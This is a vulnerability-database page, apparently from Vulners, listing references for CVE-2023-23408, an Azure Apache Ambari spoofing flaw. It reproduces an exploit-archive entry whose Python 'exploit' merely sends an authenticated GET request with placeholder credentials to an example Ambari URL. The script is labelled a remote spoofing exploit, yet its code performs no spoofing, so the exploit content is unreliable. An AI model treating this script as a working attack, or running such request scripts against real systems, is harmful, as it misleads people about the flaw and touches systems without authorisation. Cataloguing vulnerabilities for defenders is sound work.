| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2023-23408 | 14 Mar 202317:15 | – | attackerkb | |
| The vulnerability of Azure HDInsight’s data analysis service in the Windows operating system allows attackers to perform spear-phishing attacks. | 22 Mar 202300:00 | – | bdu_fstec | |
| CVE-2023-23408 | 14 Mar 202319:23 | – | circl | |
| Microsoft Azure Apache Ambari 安全漏洞 | 14 Mar 202300:00 | – | cnnvd | |
| CVE-2023-23408 | 14 Mar 202316:55 | – | cve | |
| CVE-2023-23408 Azure Apache Ambari Spoofing Vulnerability | 14 Mar 202316:55 | – | cvelist | |
| Azure Apache Ambari 2302250400 - Spoofing | 26 Jun 202300:00 | – | exploitdb | |
| EUVD-2023-27508 | 3 Oct 202520:07 | – | euvd | |
| KLA48559 Multiple vulnerabilities in Microsoft Azure | 14 Mar 202300:00 | – | kaspersky | |
| Azure Apache Ambari Spoofing Vulnerability | 14 Mar 202307:00 | – | mscve |
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
Microsoft
Apache Ambari
Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408
import requests
# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
# Define a function to validate the headers
def validate_headers(headers):
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
return False
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
return False
return True
# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
if not validate_headers(headers):
print("Invalid headers")
return
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Call the send_request function with the URL and headers
send_request(url, headers)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation